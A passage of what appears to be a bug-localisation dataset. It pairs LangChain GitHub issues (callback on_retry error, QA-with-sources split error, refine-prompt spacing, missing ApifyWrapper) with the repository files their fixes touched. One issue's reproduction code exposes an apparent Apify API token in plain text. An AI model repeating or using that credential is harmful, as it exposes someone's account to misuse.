BaseCallbackManager]]
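For orientation, a small sketch of a custom handler built on the base class above; the printing behavior is illustrative, not part of the library:

```python
# A hedged sketch; callback managers invoke these hooks with keyword
# arguments such as run_id, absorbed here by **kwargs.
class PrintingHandler(BaseCallbackHandler):
    def on_llm_start(self, serialized, prompts, **kwargs):
        # Called once per LLM invocation with the rendered prompts.
        for p in prompts:
            print(f"LLM starting with prompt: {p[:60]!r}")

    def on_llm_end(self, response, **kwargs):
        print("LLM finished.")
```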
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,542
Error: 'OpenAICallbackHandler' object has no attribute 'on_retry'`
### System Info **LangChain:** 0.0.248 **Python:** 3.10.10 **OS version:** Linux 5.10.178-162.673.amzn2.x86_64 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction **Code:**
```
try:
    with get_openai_callback() as cb:
        llm_chain = LLMChain(llm=llm, prompt=prompt_main)
        all_text = str(template) + str(prompt) + str(usescases) + str(transcript)
        threshold = llm.get_num_tokens(text=all_text) + 800
        dataframe_copy.loc[index, "Total Tokens"] = threshold
        if int(threshold) <= 4000:
            chatgpt_output = llm_chain.run({"prompt": prompt, "use_cases_dictionary": usescases, "transcript": transcript})
            chatgpt_output = text_post_processing(chatgpt_output)
            dataframe_copy.loc[index, "ChatGPT Output"] = chatgpt_output
            dataframe_copy.loc[index, "Cost (USD)"] = cb.total_cost
        else:
            dataframe_copy.loc[index, "ChatGPT Output"] = " "
            dataframe_copy.loc[index, "Cost (USD)"] = " "
except Exception as e:
    dataframe_copy.loc[index, "ChatGPT Output"] = " "
    dataframe_copy.loc[index, "Cost (USD)"] = " "
    continue
```
**Error Message:** `Retrying langchain.chat_models.openai.ChatOpenAI.completion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIError: Bad gateway. {"error":{"code":502,"message":"Bad gateway.","param":null,"type":"cf_bad_gateway"}} 502 {'error': {'code': 502, 'message': 'Bad gateway.', 'param': None, 'type': 'cf_bad_gateway'}} {'Date': 'Mon, 31 Jul 2023 20:24:53 GMT', 'Content-Type': 'application/json', 'Content-Length': '84', 'Connection': 'keep-alive', 'X-Frame-Options': 'SAMEORIGIN', 'Referrer-Policy': 'same-origin', 'Cache-Control': 'private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Expires': 'Thu, 01 Jan 1970 00:00:01 GMT', 'Server': 'cloudflare', 'CF-RAY': '7ef889a50eaca7f3-SYD', 'alt-svc': 'h3=":443"; ma=86400'}. Error in OpenAICallbackHandler.on_retry callback: 'OpenAICallbackHandler' object has no attribute 'on_retry'` ![bug](https://github.com/langchain-ai/langchain/assets/43797457/9b8025e0-f486-48bb-9d74-fdaa6cef4574) ### Expected behavior I went through the callback [documentation](https://api.python.langchain.com/en/latest/callbacks/langchain.callbacks.openai_info.OpenAICallbackHandler.html) and the "on_retry" method is indeed not listed there. So the core code for OpenAICallbackHandler likely needs to be updated, because something is calling "on_retry" on it.
https://github.com/langchain-ai/langchain/issues/8542
https://github.com/langchain-ai/langchain/pull/9230
d0a0d560add6c5bc6ded60be506a87d98bf333c3
c478fc208ed4c29e979abeb7a532eb4d01431e1b
"2023-07-31T21:01:43Z"
python
"2023-08-14T23:45:17Z"
libs/langchain/tests/unit_tests/callbacks/test_openai_info.py
import pytest

from langchain.callbacks import OpenAICallbackHandler
from langchain.llms.openai import BaseOpenAI
from langchain.schema import LLMResult


@pytest.fixture
def handler() -> OpenAICallbackHandler:
    return OpenAICallbackHandler()


def test_on_llm_end(handler: OpenAICallbackHandler) -> None:
    response = LLMResult(
        generations=[],
        llm_output={
            "token_usage": {
                "prompt_tokens": 2,
                "completion_tokens": 1,
                "total_tokens": 3,
            },
            "model_name": BaseOpenAI.__fields__["model_name"].default,
        },
    )
    handler.on_llm_end(response)
    assert handler.successful_requests == 1
    assert handler.total_tokens == 3
    assert handler.prompt_tokens == 2
    assert handler.completion_tokens == 1
    assert handler.total_cost > 0


def test_on_llm_end_custom_model(handler: OpenAICallbackHandler) -> None:
    response = LLMResult(
        generations=[],
        llm_output={
            "token_usage": {
                "prompt_tokens": 2,
                "completion_tokens": 1,
                "total_tokens": 3,
            },
            "model_name": "foo-bar",
        },
    )
    handler.on_llm_end(response)
    assert handler.total_cost == 0


def test_on_llm_end_finetuned_model(handler: OpenAICallbackHandler) -> None:
    response = LLMResult(
        generations=[],
        llm_output={
            "token_usage": {
                "prompt_tokens": 2,
                "completion_tokens": 1,
                "total_tokens": 3,
            },
            "model_name": "ada:ft-your-org:custom-model-name-2022-02-15-04-21-04",
        },
    )
    handler.on_llm_end(response)
    assert handler.total_cost > 0


@pytest.mark.parametrize(
    "model_name,expected_cost",
    [
        ("gpt-35-turbo", 0.0035),
        ("gpt-35-turbo-0301", 0.0035),
        ("gpt-35-turbo-0613", 0.0035),
        ("gpt-35-turbo-16k-0613", 0.007),
        ("gpt-35-turbo-16k", 0.007),
        ("gpt-4", 0.09),
        ("gpt-4-0314", 0.09),
        ("gpt-4-0613", 0.09),
        ("gpt-4-32k", 0.18),
        ("gpt-4-32k-0314", 0.18),
        ("gpt-4-32k-0613", 0.18),
    ],
)
def test_on_llm_end_azure_openai(
    handler: OpenAICallbackHandler, model_name: str, expected_cost: float
) -> None:
    response = LLMResult(
        generations=[],
        llm_output={
            "token_usage": {
                "prompt_tokens": 1000,
                "completion_tokens": 1000,
                "total_tokens": 2000,
            },
            "model_name": model_name,
        },
    )
    handler.on_llm_end(response)
    assert handler.total_cost == expected_cost


@pytest.mark.parametrize(
    "model_name", ["gpt-35-turbo-16k-0301", "gpt-4-0301", "gpt-4-32k-0301"]
)
def test_on_llm_end_no_cost_invalid_model(
    handler: OpenAICallbackHandler, model_name: str
) -> None:
    response = LLMResult(
        generations=[],
        llm_output={
            "token_usage": {
                "prompt_tokens": 1000,
                "completion_tokens": 1000,
                "total_tokens": 2000,
            },
            "model_name": model_name,
        },
    )
    handler.on_llm_end(response)
    assert handler.total_cost == 0
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,184
Issue: RetrievalQAWithSourcesChain gives error 'too many values to unpack (expected 2)' after running.
Hello, I'm using _langchain_ for QA with court case documents. More specifically, the RetrievalQAWithSourcesChain to retrieve the answer and document source information. However, when running the chain with embedded documents, I get the following error:
```
ValueError: too many values to unpack (expected 2)
Traceback:
response = qa({"question": pregunta}, return_only_outputs=True)
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 166, in __call__
    raise e
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 160, in __call__
    self._call(inputs, run_manager=run_manager)
File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\qa_with_sources\base.py", line 132, in _call
    answer, sources = re.split(r"SOURCES:\s", answer)
```
The passed documents are the sections from the court case. I added the following **metadata** fields: 1. Source: PDF file name. 2. Section: Name of the section. 3. Section_chunk: Numeric value used for identification in case the section was divided into chunks. 4. Page: Page where the section chunk starts. The documents are passed as a retriever to the chain via FAISS (FAISS.from_documents(documents, self.embeddings)). I tried two approaches (both resulting in the same error): 1. providing the _load_qa_chain_ as the chain 2. creating it using the class method **_.from_chain_type_**. My question is why this error occurs, and whether the type of metadata used may cause it. Thank you in advance!
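For reference, the crash can be reproduced and avoided in isolation; with `maxsplit=1`, extra `SOURCES:` markers in the model's answer no longer break the two-way unpacking. The sample string below is hypothetical:

```python
import re

# Hypothetical LLM output containing the marker twice.
answer = "Foo. SOURCES: a.pdf SOURCES: b.pdf"

# Without maxsplit, re.split returns three parts here, which is exactly what
# raises "too many values to unpack (expected 2)"; maxsplit=1 keeps it to two.
answer, sources = re.split(r"SOURCES:\s", answer, maxsplit=1)
print(answer, "|", sources)
```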
https://github.com/langchain-ai/langchain/issues/7184
https://github.com/langchain-ai/langchain/pull/8716
a3c79b1909fe1cbe85394c353b0535117ef0cdf0
8bebc9206fb77ee22a9b0592c1efb32f27bb45db
"2023-07-05T09:49:42Z"
python
"2023-08-16T20:30:15Z"
libs/langchain/langchain/chains/qa_with_sources/base.py
"""Question answering with sources over documents.""" from __future__ import annotations import inspect import re from abc import ABC, abstractmethod from typing import Any, Dict, List, Optional from pydantic_v1 import Extra, root_validator from langchain.callbacks.manager import ( AsyncCallbackManagerForChainRun, CallbackManagerForChainRun, ) from langchain.chains import ReduceDocumentsChain from langchain.chains.base import Chain from langchain.chains.combine_documents.base import BaseCombineDocumentsChain from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain from langchain.chains.combine_documents.stuff import StuffDocumentsChain from langchain.chains.llm import LLMChain from langchain.chains.qa_with_sources.loading import load_qa_with_sources_chain from langchain.chains.qa_with_sources.map_reduce_prompt import ( COMBINE_PROMPT, EXAMPLE_PROMPT, QUESTION_PROMPT, ) from langchain.docstore.document import Document from langchain.schema import BasePromptTemplate from langchain.schema.language_model import BaseLanguageModel class BaseQAWithSourcesChain(Chain, ABC): """Question answering chain with sources over documents.""" combine_documents_chain: BaseCombineDocumentsChain """Chain to use to combine documents.""" question_key: str = "question" #: :meta private: input_docs_key: str = "docs" #: :meta private: answer_key: str = "answer" #: :meta private: sources_answer_key: str = "sources" #: :meta private: return_source_documents: bool = False """Return the source documents.""" @classmethod def from_llm( cls, llm: BaseLanguageModel, document_prompt: BasePromptTemplate = EXAMPLE_PROMPT, question_prompt: BasePromptTemplate = QUESTION_PROMPT, combine_prompt: BasePromptTemplate = COMBINE_PROMPT, **kwargs: Any, ) -> BaseQAWithSourcesChain: """Construct the chain from an LLM.""" llm_question_chain = LLMChain(llm=llm, prompt=question_prompt) llm_combine_chain = LLMChain(llm=llm, prompt=combine_prompt) combine_results_chain = StuffDocumentsChain( llm_chain=llm_combine_chain, document_prompt=document_prompt, document_variable_name="summaries", ) reduce_documents_chain = ReduceDocumentsChain( combine_documents_chain=combine_results_chain ) combine_documents_chain = MapReduceDocumentsChain( llm_chain=llm_question_chain, reduce_documents_chain=reduce_documents_chain, document_variable_name="context", ) return cls( combine_documents_chain=combine_documents_chain, **kwargs, ) @classmethod def from_chain_type( cls, llm: BaseLanguageModel, chain_type: str = "stuff", chain_type_kwargs: Optional[dict] = None, **kwargs: Any, ) -> BaseQAWithSourcesChain: """Load chain from chain type.""" _chain_kwargs = chain_type_kwargs or {} combine_documents_chain = load_qa_with_sources_chain( llm, chain_type=chain_type, **_chain_kwargs ) return cls(combine_documents_chain=combine_documents_chain, **kwargs) class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def input_keys(self) -> List[str]: """Expect input key. :meta private: """ return [self.question_key] @property def output_keys(self) -> List[str]: """Return output key. 
:meta private: """ _output_keys = [self.answer_key, self.sources_answer_key] if self.return_source_documents: _output_keys = _output_keys + ["source_documents"] return _output_keys @root_validator(pre=True) def validate_naming(cls, values: Dict) -> Dict: """Fix backwards compatibility in naming.""" if "combine_document_chain" in values: values["combine_documents_chain"] = values.pop("combine_document_chain") return values @abstractmethod def _get_docs( self, inputs: Dict[str, Any], *, run_manager: CallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" def _call( self, inputs: Dict[str, Any], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, str]: _run_manager = run_manager or CallbackManagerForChainRun.get_noop_manager() accepts_run_manager = ( "run_manager" in inspect.signature(self._get_docs).parameters ) if accepts_run_manager: docs = self._get_docs(inputs, run_manager=_run_manager) else: docs = self._get_docs(inputs) # type: ignore[call-arg] answer = self.combine_documents_chain.run( input_documents=docs, callbacks=_run_manager.get_child(), **inputs ) if re.search(r"SOURCES:\s", answer): answer, sources = re.split(r"SOURCES:\s", answer) else: sources = "" result: Dict[str, Any] = { self.answer_key: answer, self.sources_answer_key: sources, } if self.return_source_documents: result["source_documents"] = docs return result @abstractmethod async def _aget_docs( self, inputs: Dict[str, Any], *, run_manager: AsyncCallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" async def _acall( self, inputs: Dict[str, Any], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> Dict[str, Any]: _run_manager = run_manager or AsyncCallbackManagerForChainRun.get_noop_manager() accepts_run_manager = ( "run_manager" in inspect.signature(self._aget_docs).parameters ) if accepts_run_manager: docs = await self._aget_docs(inputs, run_manager=_run_manager) else: docs = await self._aget_docs(inputs) # type: ignore[call-arg] answer = await self.combine_documents_chain.arun( input_documents=docs, callbacks=_run_manager.get_child(), **inputs ) if re.search(r"SOURCES:\s", answer): answer, sources = re.split(r"SOURCES:\s", answer) else: sources = "" result: Dict[str, Any] = { self.answer_key: answer, self.sources_answer_key: sources, } if self.return_source_documents: result["source_documents"] = docs return result class QAWithSourcesChain(BaseQAWithSourcesChain): """Question answering with sources over documents.""" input_docs_key: str = "docs" #: :meta private: @property def input_keys(self) -> List[str]: """Expect input key. :meta private: """ return [self.input_docs_key, self.question_key] def _get_docs( self, inputs: Dict[str, Any], *, run_manager: CallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" return inputs.pop(self.input_docs_key) async def _aget_docs( self, inputs: Dict[str, Any], *, run_manager: AsyncCallbackManagerForChainRun, ) -> List[Document]: """Get docs to run questioning over.""" return inputs.pop(self.input_docs_key) @property def _chain_type(self) -> str: return "qa_with_sources_chain"
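For orientation, a minimal usage sketch of the retrieval variant built on the base class above; `llm` and `vectorstore` are assumptions defined elsewhere, with documents carrying a `source` metadata field:

```python
# A hedged sketch; llm and vectorstore are placeholders, not from this record.
from langchain.chains import RetrievalQAWithSourcesChain

chain = RetrievalQAWithSourcesChain.from_chain_type(
    llm=llm, chain_type="stuff", retriever=vectorstore.as_retriever()
)
result = chain({"question": "What did the court decide?"}, return_only_outputs=True)
print(result["answer"], result["sources"])
```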
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,184
Issue: RetrievalQAWithSourcesChain gives error 'too many values to unpack (expected 2)' after running.
Hello, I'm using _langchain_ for QA with court case documents. More specifically, the RetrievalQAWithSourcesChain to retrieve the answer and document source information. However, when running the chain with embedded documents, I get the following error: ``` ValueError: too many values to unpack (expected 2) Traceback: response = qa({"question": pregunta}, return_only_outputs=True) File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 166, in __call__ raise e File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\base.py", line 160, in __call__ self._call(inputs, run_manager=run_manager) File "C:\Anaconda3\envs\iagen_3_10\lib\site-packages\langchain\chains\qa_with_sources\base.py", line 132, in _call answer, sources = re.split(r"SOURCES:\s", answer) ``` The passed documents are the sections from the court case. I added the following **metadata** fields: 1. Source: PDF file name. 2. Section: Name of the section 3. Section_chunk: Numeral value used for identification in case the section was divided into chunks. 4. Page: Page where the section chunk starts. The documents are passed as retriever to the chain with FAISS (FAISS.from_documents(documents, self.embeddings)). I tried out two approaches (both resulting in the same error): 1. providing the _load_qa_chain_ as chain 2. creating it using the class method **_.from_chain_type_** My question is why does this error ocurrs. And also, if the type of metadata used may cause the errors. Thank you in advance!
https://github.com/langchain-ai/langchain/issues/7184
https://github.com/langchain-ai/langchain/pull/8716
a3c79b1909fe1cbe85394c353b0535117ef0cdf0
8bebc9206fb77ee22a9b0592c1efb32f27bb45db
"2023-07-05T09:49:42Z"
python
"2023-08-16T20:30:15Z"
libs/langchain/tests/unit_tests/chains/test_qa_with_sources.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
3,117
Missing new lines or empty spaces in refine default prompt.
I'm not sure if it's a typo or not, but the default prompt in [langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[chains](https://github.com/hwchase17/langchain/tree/master/langchain/chains)/[summarize](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize)/[refine_prompts.py](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize/refine_prompts.py) seems to be missing an empty space or a `\n`:
```
REFINE_PROMPT_TMPL = (
    "Your job is to produce a final summary\n"
    "We have provided an existing summary up to a certain point: {existing_answer}\n"
    "We have the opportunity to refine the existing summary"
    "(only if needed) with some more context below.\n"
    "------------\n"
    "{text}\n"
    "------------\n"
    "Given the new context, refine the original summary"
    "If the context isn't useful, return the original summary."
)
```
It will produce `refine the original summaryIf the context isn't useful` and `existing summary(only if needed)`. I could probably fix it with a PR (if it's unintentional), but I'd prefer to let someone more experienced do it, as I'm not used to creating PRs in large projects like this.
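The underlying Python behavior is easy to demonstrate: adjacent string literals concatenate with no separator, so the template above renders without the expected break.

```python
# Adjacent literals inside parentheses are joined verbatim, which is why the
# rendered prompt reads "...original summaryIf the context isn't useful...".
tmpl = (
    "Given the new context, refine the original summary"
    "If the context isn't useful, return the original summary."
)
print(tmpl)
```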
https://github.com/langchain-ai/langchain/issues/3117
https://github.com/langchain-ai/langchain/pull/9957
4b1532876710e08aa70cdd0d52b18084f85eaed3
29270e0378661fe3d5a77cbe95311f9d4b5d33e8
"2023-04-18T22:32:58Z"
python
"2023-08-31T14:29:49Z"
libs/langchain/langchain/chains/question_answering/refine_prompts.py
# flake8: noqa
from langchain.chains.prompt_selector import ConditionalPromptSelector, is_chat_model
from langchain.prompts.chat import (
    AIMessagePromptTemplate,
    ChatPromptTemplate,
    HumanMessagePromptTemplate,
    SystemMessagePromptTemplate,
)
from langchain.prompts.prompt import PromptTemplate

DEFAULT_REFINE_PROMPT_TMPL = (
    "The original question is as follows: {question}\n"
    "We have provided an existing answer: {existing_answer}\n"
    "We have the opportunity to refine the existing answer"
    "(only if needed) with some more context below.\n"
    "------------\n"
    "{context_str}\n"
    "------------\n"
    "Given the new context, refine the original answer to better "
    "answer the question. "
    "If the context isn't useful, return the original answer."
)
DEFAULT_REFINE_PROMPT = PromptTemplate(
    input_variables=["question", "existing_answer", "context_str"],
    template=DEFAULT_REFINE_PROMPT_TMPL,
)

refine_template = (
    "We have the opportunity to refine the existing answer"
    "(only if needed) with some more context below.\n"
    "------------\n"
    "{context_str}\n"
    "------------\n"
    "Given the new context, refine the original answer to better "
    "answer the question. "
    "If the context isn't useful, return the original answer."
)
messages = [
    HumanMessagePromptTemplate.from_template("{question}"),
    AIMessagePromptTemplate.from_template("{existing_answer}"),
    HumanMessagePromptTemplate.from_template(refine_template),
]
CHAT_REFINE_PROMPT = ChatPromptTemplate.from_messages(messages)
REFINE_PROMPT_SELECTOR = ConditionalPromptSelector(
    default_prompt=DEFAULT_REFINE_PROMPT,
    conditionals=[(is_chat_model, CHAT_REFINE_PROMPT)],
)

DEFAULT_TEXT_QA_PROMPT_TMPL = (
    "Context information is below. \n"
    "---------------------\n"
    "{context_str}"
    "\n---------------------\n"
    "Given the context information and not prior knowledge, "
    "answer the question: {question}\n"
)
DEFAULT_TEXT_QA_PROMPT = PromptTemplate(
    input_variables=["context_str", "question"], template=DEFAULT_TEXT_QA_PROMPT_TMPL
)

chat_qa_prompt_template = (
    "Context information is below. \n"
    "---------------------\n"
    "{context_str}"
    "\n---------------------\n"
    "Given the context information and not prior knowledge, "
    "answer any questions"
)
messages = [
    SystemMessagePromptTemplate.from_template(chat_qa_prompt_template),
    HumanMessagePromptTemplate.from_template("{question}"),
]
CHAT_QUESTION_PROMPT = ChatPromptTemplate.from_messages(messages)
QUESTION_PROMPT_SELECTOR = ConditionalPromptSelector(
    default_prompt=DEFAULT_TEXT_QA_PROMPT,
    conditionals=[(is_chat_model, CHAT_QUESTION_PROMPT)],
)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
3,117
Missing new lines or empty spaces in refine default prompt.
I'm not sure if it's a typo or not, but the default prompt in [langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[langchain](https://github.com/hwchase17/langchain/tree/master/langchain)/[chains](https://github.com/hwchase17/langchain/tree/master/langchain/chains)/[summarize](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize)/[refine_prompts.py](https://github.com/hwchase17/langchain/tree/master/langchain/chains/summarize/refine_prompts.py) seems to be missing an empty space or a `\n`:
```
REFINE_PROMPT_TMPL = (
    "Your job is to produce a final summary\n"
    "We have provided an existing summary up to a certain point: {existing_answer}\n"
    "We have the opportunity to refine the existing summary"
    "(only if needed) with some more context below.\n"
    "------------\n"
    "{text}\n"
    "------------\n"
    "Given the new context, refine the original summary"
    "If the context isn't useful, return the original summary."
)
```
It will produce `refine the original summaryIf the context isn't useful` and `existing summary(only if needed)`. I could probably fix it with a PR (if it's unintentional), but I'd prefer to let someone more experienced do it, as I'm not used to creating PRs in large projects like this.
https://github.com/langchain-ai/langchain/issues/3117
https://github.com/langchain-ai/langchain/pull/9957
4b1532876710e08aa70cdd0d52b18084f85eaed3
29270e0378661fe3d5a77cbe95311f9d4b5d33e8
"2023-04-18T22:32:58Z"
python
"2023-08-31T14:29:49Z"
libs/langchain/langchain/chains/summarize/refine_prompts.py
# flake8: noqa
from langchain.prompts import PromptTemplate

REFINE_PROMPT_TMPL = (
    "Your job is to produce a final summary\n"
    "We have provided an existing summary up to a certain point: {existing_answer}\n"
    "We have the opportunity to refine the existing summary"
    "(only if needed) with some more context below.\n"
    "------------\n"
    "{text}\n"
    "------------\n"
    "Given the new context, refine the original summary\n"
    "If the context isn't useful, return the original summary."
)
REFINE_PROMPT = PromptTemplate(
    input_variables=["existing_answer", "text"],
    template=REFINE_PROMPT_TMPL,
)

prompt_template = """Write a concise summary of the following:


"{text}"


CONCISE SUMMARY:"""
PROMPT = PromptTemplate(template=prompt_template, input_variables=["text"])
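For orientation, a sketch of where the refine prompt above is consumed; `llm` and `docs` are assumptions defined elsewhere:

```python
# A hedged sketch; load_summarize_chain wires the REFINE_PROMPT/PROMPT pair
# above into an initial summary pass plus iterative refine passes over docs.
from langchain.chains.summarize import load_summarize_chain

chain = load_summarize_chain(llm, chain_type="refine")
summary = chain.run(docs)
```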
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,307
ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'
### System Info Hi All, I tried to run the Apify tutorial and I ran into the issue of ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'. I checked the utilities library under utilities/__init__.py and couldn't find anything under the generic integrations with third-party systems and packages. Any thoughts or support? ### Who can help? @hwchase17, @agola ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os openai.api_key = os.environ["OPEN_API_KEY"] os.environ["APIFY_API_TOKEN"] = "apify_api_qNa00bcYGUYFwIZltWiOuhskmer7E61VE6GN" apify = ApifyWrapper() loader = apify.call_actor( actor_id="apify/website-content-crawler", run_input={"startUrls": [{"url": "https://python.langchain.com/en/latest/"}]}, dataset_mapping_function=lambda item: Document( page_content=item["text"] or "", metadata={"source": item["url"]} ), ) index = VectorstoreIndexCreator().from_loaders([loader]) query = "What is LangChain?" result = index.query_with_sources(query) print(result["answer"]) print(result["sources"]) ### Expected behavior LangChain is a standard interface through which you can interact with a variety of large language models (LLMs). It provides modules that can be used to build language model applications, and it also provides chains and agents with memory capabilities. https://python.langchain.com/en/latest/modules/models/llms.html, https://python.langchain.com/en/latest/getting_started/getting_started.html
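For reference, once the linked PR re-exports the wrapper, either import below should resolve; note that the `apify-client` package must be installed separately:

```python
# A hedged sketch of the imports after the fix lands.
from langchain.utilities import ApifyWrapper  # re-exported by the fix

# Or, via the module path the PR adds:
# from langchain.utilities.apify import ApifyWrapper
```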
https://github.com/langchain-ai/langchain/issues/8307
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-26T18:18:22Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/__init__.py
"""**Utilities** are the integrations with third-part systems and packages. Other LangChain classes use **Utilities** to interact with third-part systems and packages. """ from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper from langchain.utilities.arxiv import ArxivAPIWrapper from langchain.utilities.awslambda import LambdaWrapper from langchain.utilities.bash import BashProcess from langchain.utilities.bibtex import BibtexparserWrapper from langchain.utilities.bing_search import BingSearchAPIWrapper from langchain.utilities.brave_search import BraveSearchWrapper from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper from langchain.utilities.golden_query import GoldenQueryAPIWrapper from langchain.utilities.google_places_api import GooglePlacesAPIWrapper from langchain.utilities.google_search import GoogleSearchAPIWrapper from langchain.utilities.google_serper import GoogleSerperAPIWrapper from langchain.utilities.graphql import GraphQLAPIWrapper from langchain.utilities.jira import JiraAPIWrapper from langchain.utilities.max_compute import MaxComputeAPIWrapper from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper from langchain.utilities.portkey import Portkey from langchain.utilities.powerbi import PowerBIDataset from langchain.utilities.pubmed import PubMedAPIWrapper from langchain.utilities.python import PythonREPL from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper from langchain.utilities.scenexplain import SceneXplainAPIWrapper from langchain.utilities.searx_search import SearxSearchWrapper from langchain.utilities.serpapi import SerpAPIWrapper from langchain.utilities.spark_sql import SparkSQL from langchain.utilities.sql_database import SQLDatabase from langchain.utilities.tensorflow_datasets import TensorflowDatasets from langchain.utilities.twilio import TwilioAPIWrapper from langchain.utilities.wikipedia import WikipediaAPIWrapper from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper from langchain.utilities.zapier import ZapierNLAWrapper __all__ = [ "AlphaVantageAPIWrapper", "ArxivAPIWrapper", "BashProcess", "BibtexparserWrapper", "BingSearchAPIWrapper", "BraveSearchWrapper", "DuckDuckGoSearchAPIWrapper", "GoldenQueryAPIWrapper", "GooglePlacesAPIWrapper", "GoogleSearchAPIWrapper", "GoogleSerperAPIWrapper", "GraphQLAPIWrapper", "JiraAPIWrapper", "LambdaWrapper", "MaxComputeAPIWrapper", "MetaphorSearchAPIWrapper", "OpenWeatherMapAPIWrapper", "Portkey", "PowerBIDataset", "PubMedAPIWrapper", "PythonREPL", "Requests", "RequestsWrapper", "SQLDatabase", "SceneXplainAPIWrapper", "SearxSearchWrapper", "SerpAPIWrapper", "SparkSQL", "TensorflowDatasets", "TextRequestsWrapper", "TextRequestsWrapper", "TwilioAPIWrapper", "WikipediaAPIWrapper", "WolframAlphaAPIWrapper", "ZapierNLAWrapper", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,307
ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'
### System Info Hi All, I tried to run the Apify tutorial and I ran into the issue of ImportError: cannot import name 'ApifyWrapper' from 'langchain.utilities'. I checked the utilities library under utilities/__init__.py and couldn't find anything under the generic integrations with third-party systems and packages. Any thoughts or support? ### Who can help? @hwchase17, @agola ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os openai.api_key = os.environ["OPEN_API_KEY"] os.environ["APIFY_API_TOKEN"] = "apify_api_qNa00bcYGUYFwIZltWiOuhskmer7E61VE6GN" apify = ApifyWrapper() loader = apify.call_actor( actor_id="apify/website-content-crawler", run_input={"startUrls": [{"url": "https://python.langchain.com/en/latest/"}]}, dataset_mapping_function=lambda item: Document( page_content=item["text"] or "", metadata={"source": item["url"]} ), ) index = VectorstoreIndexCreator().from_loaders([loader]) query = "What is LangChain?" result = index.query_with_sources(query) print(result["answer"]) print(result["sources"]) ### Expected behavior LangChain is a standard interface through which you can interact with a variety of large language models (LLMs). It provides modules that can be used to build language model applications, and it also provides chains and agents with memory capabilities. https://python.langchain.com/en/latest/modules/models/llms.html, https://python.langchain.com/en/latest/getting_started/getting_started.html
https://github.com/langchain-ai/langchain/issues/8307
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-26T18:18:22Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/apify.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,201
DOC: Apify integration missing
### Issue with current documentation: The Apify integration has been deleted by @hwchase17 in commit aa0e69bc98fa9c77b01e5104f12b2b779f64fd33, and thus this documentation is no longer valid: https://python.langchain.com/docs/integrations/tools/apify ### Idea or request for content: It would be highly beneficial to have information on a suitable replacement for the Apify integration.
https://github.com/langchain-ai/langchain/issues/8201
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-24T19:46:13Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/__init__.py
